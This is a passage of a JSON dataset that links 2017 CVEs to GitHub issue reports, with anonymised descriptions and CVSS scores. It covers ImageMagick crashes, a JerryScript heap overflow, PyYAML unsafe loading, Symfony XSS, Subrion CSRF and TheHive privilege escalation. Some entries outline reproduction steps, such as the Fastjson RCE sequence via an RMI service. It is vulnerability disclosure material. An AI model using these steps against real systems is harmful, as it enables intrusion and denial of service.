  11721. "description": "heap buffer overflow in lit_read_code_unit_from_hex. the following poc can trigger a heap buffer overflow bugs. ========================== APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG d at pc NUMBERTAG b6 bp NUMBERTAG bfb5e7f8 sp NUMBERTAG bfb5e7e8 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG d thread T NUMBERTAG b5 in lit_read_code_unit_from_hex PATHTAG NUMBERTAG c2 in re_parse_char_class PATHTAG NUMBERTAG bd NUMBERTAG in re_parse_alternative PATHTAG NUMBERTAG d NUMBERTAG in re_compile_bytecode PATHTAG NUMBERTAG af7 in ecma_op_create_regexp_object PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG ae0dd in ecma_builtin_dispatch_call PATHTAG NUMBERTAG fbd5e in ecma_op_function_call PATHTAG NUMBERTAG a NUMBERTAG c6 in opfunc_call PATHTAG NUMBERTAG a NUMBERTAG c6 in vm_execute PATHTAG NUMBERTAG a9dd5 in vm_run PATHTAG NUMBERTAG a9dd5 in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG b6fc NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG fc9d ( PATHTAG NUMBERTAG b NUMBERTAG d is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG b NUMBERTAG d) allocated by thread T0 here NUMBERTAG b NUMBERTAG f6dee in malloc ( PATHTAG NUMBERTAG f4c4 in APITAG PATHTAG NUMBERTAG f4c4 in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f4c4 in jmem_heap_alloc_block PATHTAG NUMBERTAG ab0b in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG ccbb in parser_compute_indicies PATHTAG NUMBERTAG ccbb in parser_post_processing PATHTAG NUMBERTAG in parser_parse_source PATHTAG NUMBERTAG b NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG b1 in jerry_parse PATHTAG NUMBERTAG b1 in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG d in main PATHTAG NUMBERTAG b6fc NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_hex Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fa NUMBERTAG b NUMBERTAG e0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG b NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING the platform is ubuntu NUMBERTAG and the build options are: python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common jerry libc=off static link=off lto=off error message=on system allocator=on",
  11722. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11723. "severity": "CRITICAL",
  11724. "baseScore": 9.8,
  11725. "impactScore": 5.9,
  11726. "exploitabilityScore": 3.9
  11727. },
  11728. {
  11729. "CVE_ID": "CVE-2017-18214",
  11730. "Issue_Url_old": "https://github.com/moment/moment/issues/4163",
  11731. "Issue_Url_new": "https://github.com/moment/moment/issues/4163",
  11732. "Repo_new": "moment/moment",
  11733. "Issue_Created_At": "2017-09-08T09:34:22Z",
  11734. "description": "Vulnerable Regular Expression. The following regular expression used to parse dates specified as strings is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  11735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11736. "severity": "HIGH",
  11737. "baseScore": 7.5,
  11738. "impactScore": 3.6,
  11739. "exploitabilityScore": 3.9
  11740. },
  11741. {
  11742. "CVE_ID": "CVE-2017-18239",
  11743. "Issue_Url_old": "https://github.com/jasongoodwin/authentikat-jwt/issues/12",
  11744. "Issue_Url_new": "https://github.com/jasongoodwin/authentikat-jwt/issues/12",
  11745. "Repo_new": "jasongoodwin/authentikat-jwt",
  11746. "Issue_Created_At": "2015-03-23T18:30:21Z",
  11747. "description": "add option to do full comparison to prevent time based guessing of the private key. Tim APITAG flagged that users may be able to guess how correct their guesses are by measuring time of response. Seems this might be difficult to actually exploit but we can add some non blocking delays or otherwise do a full comparison.",
  11748. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11749. "severity": "CRITICAL",
  11750. "baseScore": 9.8,
  11751. "impactScore": 5.9,
  11752. "exploitabilityScore": 3.9
  11753. },
  11754. {
  11755. "CVE_ID": "CVE-2017-18248",
  11756. "Issue_Url_old": "https://github.com/apple/cups/issues/5143",
  11757. "Issue_Url_new": "https://github.com/apple/cups/issues/5143",
  11758. "Repo_new": "apple/cups",
  11759. "Issue_Created_At": "2017-10-16T11:19:04Z",
  11760. "description": "Remote APITAG attack against cupsd via invalid username and malicious D Bus library. Any user who can submit a print job to a CUPS server can abort the cupsd running on the CUPS server by submitting a job as a user with an invalid username. I tested it with CUPS NUMBERTAG and also the newest NUMBERTAG so that I assume the issue is old and not fixed. I think this issue here has the same root cause as URLTAG As far as I see the fix there belongs to the LPD mini daemon but this issue here belongs to the cupsd. How to reproduce: On a APITAG client system create a user with an invalid username I use 'bin\u00e4r' as username that has the character \u00e4 APITAG small letter a with diaeresis, e.g. the German a umlaut) encoded in ISO NUMBERTAG encoding so that that username in hex byte values is APITAG NUMBERTAG e e NUMBERTAG APITAG Usually one cannot create such a username with \"useradd\" (because it rejects invalid usernames) so that one must manually edit /etc/passwd. Then as this user submit a print job from the client system to a (possibly remote) CUPS server. The cupsd on the CUPS server will bet aborted inside a D Bus library call that sends SIGABRT which aborts the whole caller process. In PATHTAG or nowadays in the \"journalctl\" one gets things like APITAG NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG process NUMBERTAG arguments to APITAG were incorrect, assertion \"_dbus_check_is_valid_utf8 ( string_p)\" failed in file dbus message.c line NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG This is normally a bug in some application using the D Bus library NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG D Bus not built with rdynamic so unable to print a backtrace NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Main process exited, code=dumped, status NUMBERTAG ABRT NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Unit entered failed state NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Failed with result 'core dump NUMBERTAG APITAG e NUMBERTAG systemd coredump NUMBERTAG Process NUMBERTAG cupsd) of user NUMBERTAG dumped core. APITAG or APITAG Oct NUMBERTAG caps cupsd NUMBERTAG process NUMBERTAG arguments to APITAG were incorrect, assertion \"_dbus_check_is_valid_utf8 ( string_p)\" failed in file dbus message.c line NUMBERTAG Oct NUMBERTAG caps cupsd NUMBERTAG This is normally a bug in some application using the D Bus library. Oct NUMBERTAG caps cupsd NUMBERTAG D Bus not built with rdynamic so unable to print a backtrace APITAG",
  11761. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  11762. "severity": "MEDIUM",
  11763. "baseScore": 5.3,
  11764. "impactScore": 3.6,
  11765. "exploitabilityScore": 1.6
  11766. },
  11767. {
  11768. "CVE_ID": "CVE-2017-18250",
  11769. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/793",
  11770. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/793",
  11771. "Repo_new": "imagemagick/imagemagick",
  11772. "Issue_Created_At": "2017-09-30T07:07:50Z",
  11773. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so the following operations on the \"log\" will dereference null pointer to cause memory error.",
  11774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11775. "severity": "MEDIUM",
  11776. "baseScore": 6.5,
  11777. "impactScore": 3.6,
  11778. "exploitabilityScore": 2.8
  11779. },
  11780. {
  11781. "CVE_ID": "CVE-2017-18251",
  11782. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/809",
  11783. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/809",
  11784. "Repo_new": "imagemagick/imagemagick",
  11785. "Issue_Created_At": "2017-09-30T07:26:22Z",
  11786. "description": "memory leak in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL,if one of the \u201cchroma1\u201d \u3001\u201cchroma2\u201d and \u201dluma\u201d is NULL at least\uff0cand the other is not\uff0cthis may cause memory leak error in \u201cIf statement\u201d.",
  11787. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11788. "severity": "MEDIUM",
  11789. "baseScore": 6.5,
  11790. "impactScore": 3.6,
  11791. "exploitabilityScore": 2.8
  11792. },
  11793. {
  11794. "CVE_ID": "CVE-2017-18252",
  11795. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/802",
  11796. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/802",
  11797. "Repo_new": "imagemagick/imagemagick",
  11798. "Issue_Created_At": "2017-09-30T07:15:01Z",
  11799. "description": "assertion failure in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL (in line NUMBERTAG and in APITAG CODETAG If the \"replace\" is NULL,it will may cause assertion failure.",
  11800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11801. "severity": "MEDIUM",
  11802. "baseScore": 6.5,
  11803. "impactScore": 3.6,
  11804. "exploitabilityScore": 2.8
  11805. },
  11806. {
  11807. "CVE_ID": "CVE-2017-18253",
  11808. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/794",
  11809. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/794",
  11810. "Repo_new": "imagemagick/imagemagick",
  11811. "Issue_Created_At": "2017-09-30T07:08:32Z",
  11812. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so some of the following operations on the \"device >platform_name\" will dereference null pointer to cause memory error.",
  11813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11814. "severity": "MEDIUM",
  11815. "baseScore": 6.5,
  11816. "impactScore": 3.6,
  11817. "exploitabilityScore": 2.8
  11818. },
  11819. {
  11820. "CVE_ID": "CVE-2017-18254",
  11821. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/808",
  11822. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/808",
  11823. "Repo_new": "imagemagick/imagemagick",
  11824. "Issue_Created_At": "2017-09-30T07:24:57Z",
  11825. "description": "memory leak in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL,if one of the \u201cglobal_colormap\u201d and \u201dcolormap\u201d is NULL\uff0cand the other is not\uff0cthis may cause memory leak error in \u201cIf statement\u201d.",
  11826. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11827. "severity": "MEDIUM",
  11828. "baseScore": 6.5,
  11829. "impactScore": 3.6,
  11830. "exploitabilityScore": 2.8
  11831. },
  11832. {
  11833. "CVE_ID": "CVE-2017-18271",
  11834. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/911",
  11835. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/911",
  11836. "Repo_new": "imagemagick/imagemagick",
  11837. "Issue_Created_At": "2017-12-22T05:36:06Z",
  11838. "description": "CPU exhaustion in APITAG INFO Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following CODETAG Trigger Command: magick convert cpu exhaustion APITAG /dev/null DEBUG when debug we found the following code is lack of EOF check, which cause a infinite loop ERRORTAG testcase: URLTAG",
  11839. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11840. "severity": "MEDIUM",
  11841. "baseScore": 6.5,
  11842. "impactScore": 3.6,
  11843. "exploitabilityScore": 2.8
  11844. },
  11845. {
  11846. "CVE_ID": "CVE-2017-18272",
  11847. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/918",
  11848. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/918",
  11849. "Repo_new": "imagemagick/imagemagick",
  11850. "Issue_Created_At": "2017-12-26T01:16:50Z",
  11851. "description": "heap use after free in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG identify verbose use after free APITAG ASAN OUTPUT ERRORTAG testcase: URLTAG",
  11852. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11853. "severity": "MEDIUM",
  11854. "baseScore": 6.5,
  11855. "impactScore": 3.6,
  11856. "exploitabilityScore": 2.8
  11857. },
  11858. {
  11859. "CVE_ID": "CVE-2017-18273",
  11860. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/910",
  11861. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/910",
  11862. "Repo_new": "imagemagick/imagemagick",
  11863. "Issue_Created_At": "2017-12-22T02:51:14Z",
  11864. "description": "cpu exhaustion in APITAG INFO Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG Memory NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Trigger Command: magick convert ./cpu exhaustion APITAG /dev/null DEBUG When debug we found a infinite loop in APITAG at APITAG CODETAG testcase: URLTAG",
  11865. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11866. "severity": "MEDIUM",
  11867. "baseScore": 6.5,
  11868. "impactScore": 3.6,
  11869. "exploitabilityScore": 2.8
  11870. },
  11871. {
  11872. "CVE_ID": "CVE-2017-18342",
  11873. "Issue_Url_old": "https://github.com/marshmallow-code/apispec/issues/278",
  11874. "Issue_Url_new": "https://github.com/marshmallow-code/apispec/issues/278",
  11875. "Repo_new": "marshmallow-code/apispec",
  11876. "Issue_Created_At": "2018-09-04T17:18:15Z",
  11877. "description": "Use APITAG in 'load_yaml_from_docstring'. Hi there! APITAG for providing a great project. Because APITAG has known security issues URLTAG , would it be feasible to use the existing APITAG option instead of APITAG here URLTAG for APITAG ? I'm happy to put in a PR if you agree. It looks like FILETAG . It doesn't look like there's been much activity by APITAG to move forward with making APITAG safe by default. Here is the pending APITAG NUMBERTAG release plan: URLTAG The APITAG security vulnerability is being flagged for our FEC API URLTAG . Please let me know if you have any questions, and thanks! Laura",
  11878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11879. "severity": "CRITICAL",
  11880. "baseScore": 9.8,
  11881. "impactScore": 5.9,
  11882. "exploitabilityScore": 3.9
  11883. },
  11884. {
  11885. "CVE_ID": "CVE-2017-18342",
  11886. "Issue_Url_old": "https://github.com/yaml/pyyaml/issues/193",
  11887. "Issue_Url_new": "https://github.com/yaml/pyyaml/issues/193",
  11888. "Repo_new": "yaml/pyyaml",
  11889. "Issue_Created_At": "2018-06-29T18:44:32Z",
  11890. "description": "APITAG NUMBERTAG Release Plan. Synopsis Make release NUMBERTAG with current master Make PR to revert NUMBERTAG APITAG team fixes broken pyyaml build system Builds wheels with libyaml NUMBERTAG linked in Fix any other NUMBERTAG blocker issues Merge in successor to NUMBERTAG IF_ it reaches approval consensus Release NUMBERTAG to APITAG Continue to work on successor if not part of NUMBERTAG Bump version to NUMBERTAG when merged The APITAG Release Situatation The most recent APITAG NUMBERTAG was released Aug NUMBERTAG At that time, Kirill turned over maintenance of APITAG and APITAG to MENTIONTAG and MENTIONTAG . Since then about NUMBERTAG PRs have been applied to APITAG and about NUMBERTAG to APITAG APITAG has a release builder: URLTAG It builds APITAG wheels against specific versions combinations of APITAG APITAG APITAG This builder no longer works and it's complicated by the fact that the build process for libyaml has been changed. The APITAG team is working hard to fix it. The NUMBERTAG release attempt was rushed out because we knew that APITAG NUMBERTAG doesn't work with Python NUMBERTAG which went out this week. We had a fix for that in master, and so we tried to get it out in time for NUMBERTAG We thought we had a Jenkins build system that would build the wheels as soon as the sdist was uploaded. So we pushed the release only to find out minutes later that this build system wasn't set up to build with libyaml. We were going to have to use the pyyaml build system. After NUMBERTAG hours of work on the windows/wheels system we decided to pull the plug on NUMBERTAG We didn't have wheels and we were getting reports of other things that were wrong. We didn't have a sense that the build system was going to get fixed soon, and we are all volunteers with limited time. Soon after the release I learned about PR NUMBERTAG and was completely surprised to find that something this big went in without my seeing it. Looking back now I remember that I had a lot going on in my life at that specific time NUMBERTAG is a non backwards compatible change at the most basic level. It changes how the dump and load functions behave. The intent of the change is a good one: Currently APITAG has the sugar API: dump, load, safe_dump, safe_load APITAG has had that API since version NUMBERTAG APITAG NUMBERTAG APITAG is trivial to exploit on untrusted data Change load and dump to be aliases to safe_load and safe_dump Add alarming (danger_ ) new functions for the old load and dump But this change has contentions: It's non back compat and is going to affect a ton of existing code The name danger is misleading when used in completely safe ways In addition, danger_dump is not known to be exploitable in any way APITAG has known about this and had a safe_ solution in place from the start People are just not feeling comfortable with the defaults The change is important, worthy of a major release, but is not ready to be part of APITAG in its current form. A new PR, building from NUMBERTAG and NUMBERTAG should be worked on. The Current Plan Forward We need to get APITAG released soon, if only for the Python NUMBERTAG release. We can't make any release at all until the build system works again. IOW, we couldn't even re release NUMBERTAG right now. The NUMBERTAG API change is big and it is more important to get it right than to rush it out. ie It APITAG may be a big can of gasoline, but nothing's on fire. ie NUMBERTAG doesn't \"fix\" anything. It just changes a default to something that's always been safe and available. There are NUMBERTAG other changes that I'd like to tackle in the next release, while at the same time taming a broken release process. My hope is that when we figure this out, it will be easy to put out APITAG releases on a regular basis. We went from NUMBERTAG to NUMBERTAG because this was a big release. It's big with or without NUMBERTAG I would like to see APITAG NUMBERTAG get out in the next few days. If the successor to NUMBERTAG is ready and approved by the time we are ready to upload NUMBERTAG it can go in. If not, then I think it should be the focus of a NUMBERTAG release. It's a big enough change to trigger a major release. It should be in the first release of either NUMBERTAG or NUMBERTAG",
  11891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11892. "severity": "CRITICAL",
  11893. "baseScore": 9.8,
  11894. "impactScore": 5.9,
  11895. "exploitabilityScore": 3.9
  11896. },
  11897. {
  11898. "CVE_ID": "CVE-2017-18343",
  11899. "Issue_Url_old": "https://github.com/symfony/symfony/issues/27987",
  11900. "Issue_Url_new": "https://github.com/symfony/symfony/issues/27987",
  11901. "Repo_new": "symfony/symfony",
  11902. "Issue_Created_At": "2018-07-18T22:16:19Z",
  11903. "description": "Security Vulnerability Cross site Scripting. Symfony Debug version(s) affected NUMBERTAG Injection Technical Details URL: PATHTAG NUMBERTAG APITAG =om3rcitak Parameter Type: Parameter Name Attack Pattern: APITAG APITAG Repro $ APITAG $ cd laravel $ APITAG $ APITAG $ php artisan serve and visit: PATHTAG NUMBERTAG APITAG =om3rcitak Possible Solution Actually your fix this vulnerability NUMBERTAG ersion but laravel NUMBERTAG using symfony/debug NUMBERTAG Your should be same fix for NUMBERTAG ersions. Notes: I am testing laravel debugger latest version NUMBERTAG for Laravel NUMBERTAG This vulnerability not effected Laravel NUMBERTAG or laravel debugger NUMBERTAG because Laravel using different error page template for version NUMBERTAG and NUMBERTAG",
  11904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11905. "severity": "MEDIUM",
  11906. "baseScore": 6.1,
  11907. "impactScore": 2.7,
  11908. "exploitabilityScore": 2.8
  11909. },
  11910. {
  11911. "CVE_ID": "CVE-2017-18343",
  11912. "Issue_Url_old": "https://github.com/barryvdh/laravel-debugbar/issues/850",
  11913. "Issue_Url_new": "https://github.com/barryvdh/laravel-debugbar/issues/850",
  11914. "Repo_new": "barryvdh/laravel-debugbar",
  11915. "Issue_Created_At": "2018-07-18T21:38:40Z",
  11916. "description": "Security Vulnerability Cross site Scripting. Security Vulnerability Cross site Scripting Environment Version : debugbar NUMBERTAG laravel NUMBERTAG OS : Unix, Windows Web server : Any web server PHP : APITAG alert NUMBERTAG APITAG =om3rcitak Parameter Type: Parameter Name Attack Pattern: APITAG APITAG Repro $ APITAG $ cd laravel $ APITAG $ APITAG $ php artisan serve and visit: PATHTAG NUMBERTAG APITAG =om3rcitak Notes: I am testing laravel debugger latest version NUMBERTAG for Laravel NUMBERTAG This vulnerability not effected Laravel NUMBERTAG or laravel debugger NUMBERTAG because Laravel using different error page template for version NUMBERTAG and NUMBERTAG",
  11917. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11918. "severity": "MEDIUM",
  11919. "baseScore": 6.1,
  11920. "impactScore": 2.7,
  11921. "exploitabilityScore": 2.8
  11922. },
  11923. {
  11924. "CVE_ID": "CVE-2017-18349",
  11925. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/466",
  11926. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/466",
  11927. "Repo_new": "pippo-java/pippo",
  11928. "Issue_Created_At": "2018-10-15T05:11:23Z",
  11929. "description": "lead to RCE when parse JSON string with Fastjson. The component APITAG converts a JSON string to an equivalent Java Object based on Fastjson(version NUMBERTAG APITAG version NUMBERTAG and prior has a remote code execution vulnerability. for details,please refer to the links below: URLTAG URLTAG APITAG Upgrade to Fastjson version NUMBERTAG or later can fix the issue. Using the following code snippet to convert a JSON string: CODETAG To exploit the vulnerability successfully,we need the following steps: step1:start a rmi service; ERRORTAG step2:put the APITAG under a web service directory which pointed by the rmi service above; ERRORTAG step3:send a post request contains the malicious JSON string; FILETAG",
  11930. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11931. "severity": "CRITICAL",
  11932. "baseScore": 9.8,
  11933. "impactScore": 5.9,
  11934. "exploitabilityScore": 3.9
  11935. },
  11936. {
  11937. "CVE_ID": "CVE-2017-18361",
  11938. "Issue_Url_old": "https://github.com/Pylons/colander/issues/290",
  11939. "Issue_Url_new": "https://github.com/pylons/colander/issues/290",
  11940. "Repo_new": "pylons/colander",
  11941. "Issue_Created_At": "2017-04-26T09:11:05Z",
  11942. "description": "Unclosed parenthesis in URL causes infinite loop. When there is an unclosed parenthesis in URL and we use _url_ validator, it causes an infinite loop. What's more interesting is that it only happens when the unclosed parenthesis is followed by many characters (check test case number NUMBERTAG and NUMBERTAG CODETAG In addition, if you check it in an online regex checker ( URLTAG it also fails. Try this regex, it's used for URL validation in colander. It's taken from PATHTAG I only escaped two slashes here. APITAG Use this URL: _ FILETAG and you'll get _catastrophic backtracking_. You can use debugger on that site to check which group falls in infinite loop.",
  11943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11944. "severity": "HIGH",
  11945. "baseScore": 7.5,
  11946. "impactScore": 3.6,
  11947. "exploitabilityScore": 3.9
  11948. },
  11949. {
  11950. "CVE_ID": "CVE-2017-18366",
  11951. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/477",
  11952. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/477",
  11953. "Repo_new": "intelliants/subrion",
  11954. "Issue_Created_At": "2017-06-30T19:41:33Z",
  11955. "description": "Critical : Remove Blog Post using CSRF attack. Hi subrion security team, Bug Description Cross site request forgery(CSRF), also known as a one click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Steps to reproduce CODETAG NUMBERTAG Save this as FILETAG NUMBERTAG Replace <post id> to post number which post you want to delete NUMBERTAG now open FILETAG via browser where you logged in with Subrion CMS NUMBERTAG Click on Submit request button NUMBERTAG the post will delete automatically. Impact An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. How to fix this vulnerability Check if this form requires CSRF protection and implement CSRF countermeasures if necessary. Regards, Rudra Sarkar URLTAG FILETAG",
  11956. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11957. "severity": "HIGH",
  11958. "baseScore": 8.8,
  11959. "impactScore": 5.9,
  11960. "exploitabilityScore": 2.8
  11961. },
  11962. {
  11963. "CVE_ID": "CVE-2017-18367",
  11964. "Issue_Url_old": "https://github.com/seccomp/libseccomp-golang/issues/22",
  11965. "Issue_Url_new": "https://github.com/seccomp/libseccomp-golang/issues/22",
  11966. "Repo_new": "seccomp/libseccomp-golang",
  11967. "Issue_Created_At": "2017-04-19T19:56:01Z",
  11968. "description": "BUG: Handling of multiple syscall arguments incorrect. Issue originally identified at URLTAG Presently, when adding a rule with multiple syscall arguments, we add each argument separately with a separate call to APITAG and a single syscall specified. This produces an OR relationship between the arguments IE, we will match if any of the arguments match. However, using libseccomp directly, adding multiple rules at the same time with a single API call will result in an AND relationship the rule will only match if all of the arguments match. Matching the behavior of the library is important, and at present use cases requiring APITAG syscall rules are not supported.",
  11969. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  11970. "severity": "HIGH",
  11971. "baseScore": 7.5,
  11972. "impactScore": 3.6,
  11973. "exploitabilityScore": 3.9
  11974. },
  11975. {
  11976. "CVE_ID": "CVE-2017-18376",
  11977. "Issue_Url_old": "https://github.com/TheHive-Project/TheHive/issues/408",
  11978. "Issue_Url_new": "https://github.com/thehive-project/thehive/issues/408",
  11979. "Repo_new": "thehive-project/thehive",
  11980. "Issue_Created_At": "2017-12-22T15:13:08Z",
  11981. "description": "THP SEC AD NUMBERTAG Privilege Escalation in all Versions of APITAG Request Type Bug Problem Description A privilege escalation vulnerability has been identified in APITAG It allows users with read only or read/write access to escalate their privileges and eventually become administrators. Conditions To exploit the vulnerability, an attacker must have access to an account on APITAG with read only or read/write privileges. The attacker needs to interact with the API in a specific though trivial way to obtain administrator privileges. After verifying that their request has been correctly processed, they connect To APITAG using the Web UI and they will see the administrator menu from where they can edit or lock user accounts, add case templates, etc. Impacted Versions This vulnerability impacts all versions of APITAG as of this writing, including APITAG NUMBERTAG APITAG NUMBERTAG Possible Solutions APITAG Project has confirmed the vulnerability and a hotfix for Mellifera NUMBERTAG APITAG NUMBERTAG and Cerana NUMBERTAG APITAG NUMBERTAG will be released very soon. Credits The vulnerability has been found and reported by Jeffrey Everling.",
  11982. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11983. "severity": "HIGH",
  11984. "baseScore": 8.8,
  11985. "impactScore": 5.9,
  11986. "exploitabilityScore": 2.8
  11987. },
  11988. {
  11989. "CVE_ID": "CVE-2017-18594",
  11990. "Issue_Url_old": "https://github.com/nmap/nmap/issues/1227",
  11991. "Issue_Url_new": "https://github.com/nmap/nmap/issues/1227",
  11992. "Repo_new": "nmap/nmap",
